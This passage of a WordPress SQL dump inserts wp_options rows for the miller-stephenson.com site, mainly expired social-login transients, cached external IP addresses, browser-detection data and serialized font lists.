INSERT INTO `wp_options` VALUES (687244, '_site_transient_timeout_nextend598daa8e13e389.72439444_fb_r', '1502460062', 'no'); 
INSERT INTO `wp_options` VALUES (687245, '_site_transient_nextend598daa8e13e389.72439444_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (687249, '_site_transient_timeout_n_nextend598dac7953d5f9.16532633', '1502460553', 'no'); 
INSERT INTO `wp_options` VALUES (687250, '_site_transient_n_nextend598dac7953d5f9.16532633', '1', 'no'); 
INSERT INTO `wp_options` VALUES (687251, '_site_transient_timeout_nextend598dac7953d5f9.16532633_google_r', '1502460553', 'no'); 
INSERT INTO `wp_options` VALUES (687252, '_site_transient_nextend598dac7953d5f9.16532633_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (687254, '_site_transient_timeout_n_nextend598daf6fab7cd1.80535041', '1502461311', 'no'); 
INSERT INTO `wp_options` VALUES (687255, '_site_transient_n_nextend598daf6fab7cd1.80535041', '1', 'no'); 
INSERT INTO `wp_options` VALUES (687256, '_site_transient_timeout_nextend598daf6fab7cd1.80535041_fb_state', '1502461311', 'no'); 
INSERT INTO `wp_options` VALUES (687257, '_site_transient_nextend598daf6fab7cd1.80535041_fb_state', '69785247542781ab5da6b580647e1103', 'no'); 
INSERT INTO `wp_options` VALUES (687258, '_site_transient_timeout_nextend598daf6fab7cd1.80535041_fb_r', '1502461311', 'no'); 
INSERT INTO `wp_options` VALUES (687259, '_site_transient_nextend598daf6fab7cd1.80535041_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (687284, '_site_transient_timeout_n_nextend598dc775548bc7.14317168', '1502467461', 'no'); 
INSERT INTO `wp_options` VALUES (687285, '_site_transient_n_nextend598dc775548bc7.14317168', '1', 'no'); 
INSERT INTO `wp_options` VALUES (687286, '_site_transient_timeout_nextend598dc775548bc7.14317168_google_r', '1502467461', 'no'); 
INSERT INTO `wp_options` VALUES (687287, '_site_transient_nextend598dc775548bc7.14317168_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (687513, '_site_transient_timeout_n_nextend598e779d8d7491.98656377', '1502512557', 'no'); 
INSERT INTO `wp_options` VALUES (687514, '_site_transient_n_nextend598e779d8d7491.98656377', '1', 'no'); 
INSERT INTO `wp_options` VALUES (687515, '_site_transient_timeout_nextend598e779d8d7491.98656377_google_r', '1502512557', 'no'); 
INSERT INTO `wp_options` VALUES (687516, '_site_transient_nextend598e779d8d7491.98656377_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (687552, '_site_transient_timeout_n_nextend598e9e39aef207.53715577', '1502522441', 'no'); 
INSERT INTO `wp_options` VALUES (687553, '_site_transient_n_nextend598e9e39aef207.53715577', '1', 'no'); 
INSERT INTO `wp_options` VALUES (687554, '_site_transient_timeout_nextend598e9e39aef207.53715577_fb_state', '1502522441', 'no'); 
INSERT INTO `wp_options` VALUES (687555, '_site_transient_nextend598e9e39aef207.53715577_fb_state', '6e7c9b326a18425a3ad0a6beee261c94', 'no'); 
INSERT INTO `wp_options` VALUES (687556, '_site_transient_timeout_nextend598e9e39aef207.53715577_fb_r', '1502522441', 'no'); 
INSERT INTO `wp_options` VALUES (687557, '_site_transient_nextend598e9e39aef207.53715577_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (687680, '_site_transient_timeout_n_nextend598f2506a12e93.45783450', '1502556950', 'no'); 
INSERT INTO `wp_options` VALUES (687681, '_site_transient_n_nextend598f2506a12e93.45783450', '1', 'no'); 
INSERT INTO `wp_options` VALUES (687682, '_site_transient_timeout_nextend598f2506a12e93.45783450_fb_state', '1502556950', 'no'); 
INSERT INTO `wp_options` VALUES (687683, '_site_transient_nextend598f2506a12e93.45783450_fb_state', 'f8df629c5e29914154b316149dd96783', 'no'); 
INSERT INTO `wp_options` VALUES (687684, '_site_transient_timeout_nextend598f2506a12e93.45783450_fb_r', '1502556950', 'no'); 
INSERT INTO `wp_options` VALUES (687685, '_site_transient_nextend598f2506a12e93.45783450_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (687698, '_site_transient_timeout_n_nextend598f2da14b5524.37712577', '1502559153', 'no'); 
INSERT INTO `wp_options` VALUES (687699, '_site_transient_n_nextend598f2da14b5524.37712577', '1', 'no'); 
INSERT INTO `wp_options` VALUES (687700, '_site_transient_timeout_nextend598f2da14b5524.37712577_google_r', '1502559153', 'no'); 
INSERT INTO `wp_options` VALUES (687701, '_site_transient_nextend598f2da14b5524.37712577_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (687825, '_site_transient_timeout_n_nextend598fbeb87652a1.93142054', '1502596296', 'no'); 
INSERT INTO `wp_options` VALUES (687826, '_site_transient_n_nextend598fbeb87652a1.93142054', '1', 'no'); 
INSERT INTO `wp_options` VALUES (687827, '_site_transient_timeout_nextend598fbeb87652a1.93142054_fb_state', '1502596296', 'no'); 
INSERT INTO `wp_options` VALUES (687828, '_site_transient_nextend598fbeb87652a1.93142054_fb_state', '4506df4f3024ec63bb817d0831bc9455', 'no'); 
INSERT INTO `wp_options` VALUES (687829, '_site_transient_timeout_nextend598fbeb87652a1.93142054_fb_r', '1502596296', 'no'); 
INSERT INTO `wp_options` VALUES (687830, '_site_transient_nextend598fbeb87652a1.93142054_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (687831, '_site_transient_timeout_n_nextend598fbebbe34391.58601226', '1502596299', 'no'); 
INSERT INTO `wp_options` VALUES (687832, '_site_transient_n_nextend598fbebbe34391.58601226', '1', 'no'); 
INSERT INTO `wp_options` VALUES (687833, '_site_transient_timeout_nextend598fbebbe34391.58601226_google_r', '1502596300', 'no'); 
INSERT INTO `wp_options` VALUES (687834, '_site_transient_nextend598fbebbe34391.58601226_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (688297, '_site_transient_timeout_n_nextend5991787c729f56.97153465', '1502709388', 'no'); 
INSERT INTO `wp_options` VALUES (688298, '_site_transient_n_nextend5991787c729f56.97153465', '1', 'no'); 
INSERT INTO `wp_options` VALUES (688315, '_site_transient_timeout_n_nextend59918a3f74c996.67073907', '1502713935', 'no'); 
INSERT INTO `wp_options` VALUES (688316, '_site_transient_n_nextend59918a3f74c996.67073907', '1', 'no'); 
INSERT INTO `wp_options` VALUES (688317, '_site_transient_timeout_nextend59918a3f74c996.67073907_fb_state', '1502713935', 'no'); 
INSERT INTO `wp_options` VALUES (688318, '_site_transient_nextend59918a3f74c996.67073907_fb_state', 'aef7e2eb2f9f1842e0174f3c22062230', 'no'); 
INSERT INTO `wp_options` VALUES (688319, '_site_transient_timeout_nextend59918a3f74c996.67073907_fb_r', '1502713935', 'no'); 
INSERT INTO `wp_options` VALUES (688320, '_site_transient_nextend59918a3f74c996.67073907_fb_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (688386, '_site_transient_timeout_n_nextend5991ae2ea8c9f5.55496394', '1502723134', 'no'); 
INSERT INTO `wp_options` VALUES (688387, '_site_transient_n_nextend5991ae2ea8c9f5.55496394', '1', 'no'); 
INSERT INTO `wp_options` VALUES (688388, '_site_transient_timeout_nextend5991ae2ea8c9f5.55496394_google_r', '1502723134', 'no'); 
INSERT INTO `wp_options` VALUES (688389, '_site_transient_nextend5991ae2ea8c9f5.55496394_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (688946, '_site_transient_timeout_n_nextend599310cd3c7679.34699350', '1502813917', 'no'); 
INSERT INTO `wp_options` VALUES (688947, '_site_transient_n_nextend599310cd3c7679.34699350', '1', 'no'); 
INSERT INTO `wp_options` VALUES (688948, '_site_transient_timeout_nextend599310cd3c7679.34699350_fb_state', '1502813917', 'no'); 
INSERT INTO `wp_options` VALUES (688949, '_site_transient_nextend599310cd3c7679.34699350_fb_state', '7be876b8d77ea557cccd8bc71d32364b', 'no'); 
INSERT INTO `wp_options` VALUES (688950, '_site_transient_timeout_nextend599310cd3c7679.34699350_fb_r', '1502813917', 'no'); 
INSERT INTO `wp_options` VALUES (688951, '_site_transient_nextend599310cd3c7679.34699350_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (689028, '_site_transient_timeout_n_nextend59933f887187e3.24341485', '1502825880', 'no'); 
INSERT INTO `wp_options` VALUES (689029, '_site_transient_n_nextend59933f887187e3.24341485', '1', 'no'); 
INSERT INTO `wp_options` VALUES (689030, '_site_transient_timeout_nextend59933f887187e3.24341485_fb_state', '1502825880', 'no'); 
INSERT INTO `wp_options` VALUES (689031, '_site_transient_nextend59933f887187e3.24341485_fb_state', '56740a9851c73ca0cbe7d69d960bcfc1', 'no'); 
INSERT INTO `wp_options` VALUES (689032, '_site_transient_timeout_nextend59933f887187e3.24341485_fb_r', '1502825880', 'no'); 
INSERT INTO `wp_options` VALUES (689033, '_site_transient_nextend59933f887187e3.24341485_fb_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (689150, '_site_transient_timeout_n_nextend59938729725ed7.83541998', '1502844217', 'no'); 
INSERT INTO `wp_options` VALUES (689151, '_site_transient_n_nextend59938729725ed7.83541998', '1', 'no'); 
INSERT INTO `wp_options` VALUES (689152, '_site_transient_timeout_nextend59938729725ed7.83541998_fb_state', '1502844217', 'no'); 
INSERT INTO `wp_options` VALUES (689153, '_site_transient_nextend59938729725ed7.83541998_fb_state', '8baa47e303e98876f89c94cb76475704', 'no'); 
INSERT INTO `wp_options` VALUES (689154, '_site_transient_timeout_nextend59938729725ed7.83541998_fb_r', '1502844217', 'no'); 
INSERT INTO `wp_options` VALUES (689155, '_site_transient_nextend59938729725ed7.83541998_fb_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (689158, '_site_transient_timeout_n_nextend5993877a3bbfc4.74570004', '1502844298', 'no'); 
INSERT INTO `wp_options` VALUES (689159, '_site_transient_n_nextend5993877a3bbfc4.74570004', '1', 'no'); 
INSERT INTO `wp_options` VALUES (689212, '_site_transient_timeout_n_nextend5993b1226a4361.80800280', '1502854962', 'no'); 
INSERT INTO `wp_options` VALUES (689213, '_site_transient_n_nextend5993b1226a4361.80800280', '1', 'no'); 
INSERT INTO `wp_options` VALUES (689214, '_site_transient_timeout_nextend5993b1226a4361.80800280_google_r', '1502854962', 'no'); 
INSERT INTO `wp_options` VALUES (689215, '_site_transient_nextend5993b1226a4361.80800280_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (689269, '_transient_timeout_external_ip_address_127.0.0.1', '1503472716', 'no'); 
INSERT INTO `wp_options` VALUES (689270, '_transient_external_ip_address_127.0.0.1', '104.238.94.202', 'no'); 
INSERT INTO `wp_options` VALUES (689385, '_transient_timeout_external_ip_address_172.16.122.31', '1503499312', 'no'); 
INSERT INTO `wp_options` VALUES (689386, '_transient_external_ip_address_172.16.122.31', '104.238.94.202', 'no'); 
INSERT INTO `wp_options` VALUES (689420, '_site_transient_timeout_n_nextend599473aab865d9.24939341', '1502904762', 'no'); 
INSERT INTO `wp_options` VALUES (689421, '_site_transient_n_nextend599473aab865d9.24939341', '1', 'no'); 
INSERT INTO `wp_options` VALUES (689422, '_site_transient_timeout_nextend599473aab865d9.24939341_google_r', '1502904762', 'no'); 
INSERT INTO `wp_options` VALUES (689423, '_site_transient_nextend599473aab865d9.24939341_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (689448, '_site_transient_timeout_n_nextend5994886f27cac5.62162479', '1502910079', 'no'); 
INSERT INTO `wp_options` VALUES (689449, '_site_transient_n_nextend5994886f27cac5.62162479', '1', 'no'); 
INSERT INTO `wp_options` VALUES (689450, '_site_transient_timeout_nextend5994886f27cac5.62162479_fb_state', '1502910079', 'no'); 
INSERT INTO `wp_options` VALUES (689451, '_site_transient_nextend5994886f27cac5.62162479_fb_state', 'add3de631e22a9943d8e14dcce1ad16f', 'no'); 
INSERT INTO `wp_options` VALUES (689452, '_site_transient_timeout_nextend5994886f27cac5.62162479_fb_r', '1502910079', 'no'); 
INSERT INTO `wp_options` VALUES (689453, '_site_transient_nextend5994886f27cac5.62162479_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (689454, '_site_transient_timeout_n_nextend5994887026bd08.64180174', '1502910080', 'no'); 
INSERT INTO `wp_options` VALUES (689455, '_site_transient_n_nextend5994887026bd08.64180174', '1', 'no'); 
INSERT INTO `wp_options` VALUES (689456, '_site_transient_timeout_nextend5994887026bd08.64180174_google_r', '1502910080', 'no'); 
INSERT INTO `wp_options` VALUES (689457, '_site_transient_nextend5994887026bd08.64180174_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (689643, '_transient_timeout_external_ip_address_10.142.24.224', '1503556783', 'no'); 
INSERT INTO `wp_options` VALUES (689644, '_transient_external_ip_address_10.142.24.224', '104.238.94.202', 'no'); 
INSERT INTO `wp_options` VALUES (689747, '_site_transient_timeout_n_nextend599591246de607.79863784', '1502977844', 'no'); 
INSERT INTO `wp_options` VALUES (689748, '_site_transient_n_nextend599591246de607.79863784', '1', 'no'); 
INSERT INTO `wp_options` VALUES (689749, '_site_transient_timeout_nextend599591246de607.79863784_fb_state', '1502977844', 'no'); 
INSERT INTO `wp_options` VALUES (689750, '_site_transient_nextend599591246de607.79863784_fb_state', 'd42d5f64810b879a03b370b50b3f28ac', 'no'); 
INSERT INTO `wp_options` VALUES (689751, '_site_transient_timeout_nextend599591246de607.79863784_fb_r', '1502977844', 'no'); 
INSERT INTO `wp_options` VALUES (689752, '_site_transient_nextend599591246de607.79863784_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (689861, '_site_transient_timeout_n_nextend5995e117574df8.55521190', '1502998311', 'no'); 
INSERT INTO `wp_options` VALUES (689862, '_site_transient_n_nextend5995e117574df8.55521190', '1', 'no'); 
INSERT INTO `wp_options` VALUES (689863, '_site_transient_timeout_nextend5995e117574df8.55521190_fb_state', '1502998311', 'no'); 
INSERT INTO `wp_options` VALUES (689864, '_site_transient_nextend5995e117574df8.55521190_fb_state', 'cbe4ff5b5174080253b3fd8cd7669828', 'no'); 
INSERT INTO `wp_options` VALUES (689865, '_site_transient_timeout_nextend5995e117574df8.55521190_fb_r', '1502998311', 'no'); 
INSERT INTO `wp_options` VALUES (689866, '_site_transient_nextend5995e117574df8.55521190_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (689867, '_site_transient_timeout_n_nextend5995e1190b1738.12772762', '1502998313', 'no'); 
INSERT INTO `wp_options` VALUES (689868, '_site_transient_n_nextend5995e1190b1738.12772762', '1', 'no'); 
INSERT INTO `wp_options` VALUES (689869, '_site_transient_timeout_nextend5995e1190b1738.12772762_google_r', '1502998313', 'no'); 
INSERT INTO `wp_options` VALUES (689870, '_site_transient_nextend5995e1190b1738.12772762_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (689879, '_site_transient_timeout_n_nextend5995e57ed43bd5.58613025', '1502999438', 'no'); 
INSERT INTO `wp_options` VALUES (689880, '_site_transient_n_nextend5995e57ed43bd5.58613025', '1', 'no'); 
INSERT INTO `wp_options` VALUES (689881, '_site_transient_timeout_nextend5995e57ed43bd5.58613025_fb_state', '1502999438', 'no'); 
INSERT INTO `wp_options` VALUES (689882, '_site_transient_nextend5995e57ed43bd5.58613025_fb_state', 'e841f235a5aae0ead8f32adeb035398f', 'no'); 
INSERT INTO `wp_options` VALUES (689883, '_site_transient_timeout_nextend5995e57ed43bd5.58613025_fb_r', '1502999439', 'no'); 
INSERT INTO `wp_options` VALUES (689884, '_site_transient_nextend5995e57ed43bd5.58613025_fb_r', 'https://www.miller-stephenson.com/my-account/lost-password/', 'no'); 
INSERT INTO `wp_options` VALUES (689903, '_transient_timeout_wdm_pep_license_trans', '1503602158', 'no'); 
INSERT INTO `wp_options` VALUES (689904, '_transient_wdm_pep_license_trans', 'valid', 'no'); 
INSERT INTO `wp_options` VALUES (689910, '_site_transient_timeout_browser_52c786e5a432d0195252a5890724fd2d', '1503602159', 'no'); 
INSERT INTO `wp_options` VALUES (689911, '_site_transient_browser_52c786e5a432d0195252a5890724fd2d', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:6:"Chrome";s:7:"version";s:12:"60.0.3112.90";s:10:"update_url";s:28:"http://www.google.com/chrome";s:7:"img_src";s:49:"http://s.wordpress.org/images/browsers/chrome.png";s:11:"img_src_ssl";s:48:"https://wordpress.org/images/browsers/chrome.png";s:15:"current_version";s:2:"18";s:7:"upgrade";b:0;s:8:"insecure";b:0;}', 'no'); 
INSERT INTO `wp_options` VALUES (690160, '_site_transient_timeout_n_nextend59964b601d42f6.10276309', '1503025520', 'no'); 
INSERT INTO `wp_options` VALUES (690161, '_site_transient_n_nextend59964b601d42f6.10276309', '1', 'no'); 
INSERT INTO `wp_options` VALUES (690162, '_site_transient_timeout_nextend59964b601d42f6.10276309_fb_state', '1503025520', 'no'); 
INSERT INTO `wp_options` VALUES (690163, '_site_transient_nextend59964b601d42f6.10276309_fb_state', 'dea5cd72e8b17973e919a5a0f87ec2f3', 'no'); 
INSERT INTO `wp_options` VALUES (690164, '_site_transient_timeout_nextend59964b601d42f6.10276309_fb_r', '1503025520', 'no'); 
INSERT INTO `wp_options` VALUES (690165, '_site_transient_nextend59964b601d42f6.10276309_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (690218, '_site_transient_timeout_n_nextend5996721b6eff05.78516846', '1503035435', 'no'); 
INSERT INTO `wp_options` VALUES (690219, '_site_transient_n_nextend5996721b6eff05.78516846', '1', 'no'); 
INSERT INTO `wp_options` VALUES (690220, '_site_transient_timeout_nextend5996721b6eff05.78516846_google_r', '1503035435', 'no'); 
INSERT INTO `wp_options` VALUES (690221, '_site_transient_nextend5996721b6eff05.78516846_google_r', '', 'no'); 
INSERT INTO `wp_options` VALUES (690226, '_site_transient_timeout_n_nextend5996741bc522c2.85348764', '1503035947', 'no'); 
INSERT INTO `wp_options` VALUES (690227, '_site_transient_n_nextend5996741bc522c2.85348764', '1', 'no'); 
INSERT INTO `wp_options` VALUES (690228, '_site_transient_timeout_nextend5996741bc522c2.85348764_fb_state', '1503035947', 'no'); 
INSERT INTO `wp_options` VALUES (690229, '_site_transient_nextend5996741bc522c2.85348764_fb_state', '1a86a98c9b37cf5f667652b6c519255a', 'no'); 
INSERT INTO `wp_options` VALUES (690230, '_site_transient_timeout_nextend5996741bc522c2.85348764_fb_r', '1503035947', 'no'); 
INSERT INTO `wp_options` VALUES (690231, '_site_transient_nextend5996741bc522c2.85348764_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (690245, '_site_transient_timeout_n_nextend599683df8eb8d3.95808762', '1503039983', 'no'); 
INSERT INTO `wp_options` VALUES (690246, '_site_transient_n_nextend599683df8eb8d3.95808762', '1', 'no'); 
INSERT INTO `wp_options` VALUES (690247, '_site_transient_timeout_nextend599683df8eb8d3.95808762_fb_state', '1503039983', 'no'); 
INSERT INTO `wp_options` VALUES (690248, '_site_transient_nextend599683df8eb8d3.95808762_fb_state', '09afbbe15f368a58838fc4b7fb7a486d', 'no'); 
INSERT INTO `wp_options` VALUES (690249, '_site_transient_timeout_nextend599683df8eb8d3.95808762_fb_r', '1503039983', 'no'); 
INSERT INTO `wp_options` VALUES (690250, '_site_transient_nextend599683df8eb8d3.95808762_fb_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (690271, '_site_transient_timeout_n_nextend599695888fefb5.31483924', '1503044504', 'no'); 
INSERT INTO `wp_options` VALUES (690272, '_site_transient_n_nextend599695888fefb5.31483924', '1', 'no'); 
INSERT INTO `wp_options` VALUES (690273, '_site_transient_timeout_nextend599695888fefb5.31483924_fb_state', '1503044504', 'no'); 
INSERT INTO `wp_options` VALUES (690274, '_site_transient_nextend599695888fefb5.31483924_fb_state', '5dfa128c1373630233abeaa8f577240b', 'no'); 
INSERT INTO `wp_options` VALUES (690275, '_site_transient_timeout_nextend599695888fefb5.31483924_fb_r', '1503044504', 'no'); 
INSERT INTO `wp_options` VALUES (690276, '_site_transient_nextend599695888fefb5.31483924_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (690324, '_transient_timeout_external_ip_address_253.128.25.63', '1503656878', 'no'); 
INSERT INTO `wp_options` VALUES (690325, '_transient_external_ip_address_253.128.25.63', '104.238.94.202', 'no'); 
INSERT INTO `wp_options` VALUES (690411, '_site_transient_timeout_browser_bd9c32849e24d76de4d61ef65b8c67c5', '1503667385', 'no'); 
INSERT INTO `wp_options` VALUES (690412, '_site_transient_browser_bd9c32849e24d76de4d61ef65b8c67c5', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:6:"Chrome";s:7:"version";s:13:"60.0.3112.101";s:10:"update_url";s:28:"http://www.google.com/chrome";s:7:"img_src";s:49:"http://s.wordpress.org/images/browsers/chrome.png";s:11:"img_src_ssl";s:48:"https://wordpress.org/images/browsers/chrome.png";s:15:"current_version";s:2:"18";s:7:"upgrade";b:0;s:8:"insecure";b:0;}', 'no'); 
INSERT INTO `wp_options` VALUES (690436, '_transient_timeout_tt_font_default_fonts', '1504272202', 'no'); 
INSERT INTO `wp_options` VALUES (690437, '_transient_tt_font_default_fonts', 'a:14:{s:5:"arial";a:6:{s:4:"name";s:5:"Arial";s:9:"font_type";s:7:"default";s:12:"font_weights";a:4:{i:0;s:3:"400";i:1;s:9:"400italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:0:{}s:5:"files";a:0:{}s:4:"urls";a:4:{i:400;s:0:"";s:9:"400italic";s:0:"";i:700;s:0:"";s:9:"700italic";s:0:"";}}s:14:"century_gothic";a:6:{s:4:"name";s:14:"Century Gothic";s:9:"font_type";s:7:"default";s:12:"font_weights";a:4:{i:0;s:3:"400";i:1;s:9:"400italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:0:{}s:5:"files";a:0:{}s:4:"urls";a:4:{i:400;s:0:"";s:9:"400italic";s:0:"";i:700;s:0:"";s:9:"700italic";s:0:"";}}s:11:"courier_new";a:6:{s:4:"name";s:11:"Courier New";s:9:"font_type";s:7:"default";s:12:"font_weights";a:4:{i:0;s:3:"400";i:1;s:9:"400italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:0:{}s:5:"files";a:0:{}s:4:"urls";a:4:{i:400;s:0:"";s:9:"400italic";s:0:"";i:700;s:0:"";s:9:"700italic";s:0:"";}}s:7:"georgia";a:6:{s:4:"name";s:7:"Georgia";s:9:"font_type";s:7:"default";s:12:"font_weights";a:4:{i:0;s:3:"400";i:1;s:9:"400italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:0:{}s:5:"files";a:0:{}s:4:"urls";a:4:{i:400;s:0:"";s:9:"400italic";s:0:"";i:700;s:0:"";s:9:"700italic";s:0:"";}}s:9:"helvetica";a:6:{s:4:"name";s:9:"Helvetica";s:9:"font_type";s:7:"default";s:12:"font_weights";a:4:{i:0;s:3:"400";i:1;s:9:"400italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:0:{}s:5:"files";a:0:{}s:4:"urls";a:4:{i:400;s:0:"";s:9:"400italic";s:0:"";i:700;s:0:"";s:9:"700italic";s:0:"";}}s:6:"impact";a:6:{s:4:"name";s:6:"Impact";s:9:"font_type";s:7:"default";s:12:"font_weights";a:4:{i:0;s:3:"400";i:1;s:9:"400italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:0:{}s:5:"files";a:0:{}s:4:"urls";a:4:{i:400;s:0:"";s:9:"400italic";s:0:"";i:700;s:0:"";s:9:"700italic";s:0:"";}}s:14:"lucida_console";a:6:{s:4:"name";s:14:"Lucida Console";s:9:"font_type";s:7:"default";s:12:"font_weights";a:4:{i:0;s:3:"400";i:1;s:9:"400italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:0:{}s:5:"files";a:0:{}s:4:"urls";a:4:{i:400;s:0:"";s:9:"400italic";s:0:"";i:700;s:0:"";s:9:"700italic";s:0:"";}}s:19:"lucida_sans_unicode";a:6:{s:4:"name";s:19:"Lucida Sans Unicode";s:9:"font_type";s:7:"default";s:12:"font_weights";a:4:{i:0;s:3:"400";i:1;s:9:"400italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:0:{}s:5:"files";a:0:{}s:4:"urls";a:4:{i:400;s:0:"";s:9:"400italic";s:0:"";i:700;s:0:"";s:9:"700italic";s:0:"";}}s:17:"palatino_linotype";a:6:{s:4:"name";s:17:"Palatino Linotype";s:9:"font_type";s:7:"default";s:12:"font_weights";a:4:{i:0;s:3:"400";i:1;s:9:"400italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:0:{}s:5:"files";a:0:{}s:4:"urls";a:4:{i:400;s:0:"";s:9:"400italic";s:0:"";i:700;s:0:"";s:9:"700italic";s:0:"";}}s:10:"sans-serif";a:6:{s:4:"name";s:10:"sans-serif";s:9:"font_type";s:7:"default";s:12:"font_weights";a:4:{i:0;s:3:"400";i:1;s:9:"400italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:0:{}s:5:"files";a:0:{}s:4:"urls";a:4:{i:400;s:0:"";s:9:"400italic";s:0:"";i:700;s:0:"";s:9:"700italic";s:0:"";}}s:5:"serif";a:6:{s:4:"name";s:5:"serif";s:9:"font_type";s:7:"default";s:12:"font_weights";a:4:{i:0;s:3:"400";i:1;s:9:"400italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:0:{}s:5:"files";a:0:{}s:4:"urls";a:4:{i:400;s:0:"";s:9:"400italic";s:0:"";i:700;s:0:"";s:9:"700italic";s:0:"";}}s:6:"tahoma";a:6:{s:4:"name";s:6:"Tahoma";s:9:"font_type";s:7:"default";s:12:"font_weights";a:4:{i:0;s:3:"400";i:1;s:9:"400italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:0:{}s:5:"files";a:0:{}s:4:"urls";a:4:{i:400;s:0:"";s:9:"400italic";s:0:"";i:700;s:0:"";s:9:"700italic";s:0:"";}}s:12:"trebuchet_ms";a:6:{s:4:"name";s:12:"Trebuchet MS";s:9:"font_type";s:7:"default";s:12:"font_weights";a:4:{i:0;s:3:"400";i:1;s:9:"400italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:0:{}s:5:"files";a:0:{}s:4:"urls";a:4:{i:400;s:0:"";s:9:"400italic";s:0:"";i:700;s:0:"";s:9:"700italic";s:0:"";}}s:7:"verdana";a:6:{s:4:"name";s:7:"Verdana";s:9:"font_type";s:7:"default";s:12:"font_weights";a:4:{i:0;s:3:"400";i:1;s:9:"400italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:0:{}s:5:"files";a:0:{}s:4:"urls";a:4:{i:400;s:0:"";s:9:"400italic";s:0:"";i:700;s:0:"";s:9:"700italic";s:0:"";}}}', 'no'); 
INSERT INTO `wp_options` VALUES (690438, '_transient_timeout_tt_font_google_fonts_list', '1504272202', 'no'); 
INSERT INTO `wp_options` VALUES (690439, '_transient_tt_font_google_fonts_list', 'a:809:{s:7:"abeezee";a:7:{s:4:"name";s:7:"ABeeZee";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/abeezee/v9/mE5BOuZKGln_Ex0uYKpIaw.ttf";s:6:"italic";s:64:"http://fonts.gstatic.com/s/abeezee/v9/kpplLynmYgP0YtlJA3atRw.ttf";}s:4:"urls";a:2:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=ABeeZee:regular";s:6:"italic";s:54:"https://fonts.googleapis.com/css?family=ABeeZee:italic";}}s:4:"abel";a:7:{s:4:"name";s:4:"Abel";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/abel/v6/RpUKfqNxoyNe_ka23bzQ2A.ttf";}s:4:"urls";a:1:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Abel:regular";}}s:12:"abhaya_libre";a:7:{s:4:"name";s:12:"Abhaya 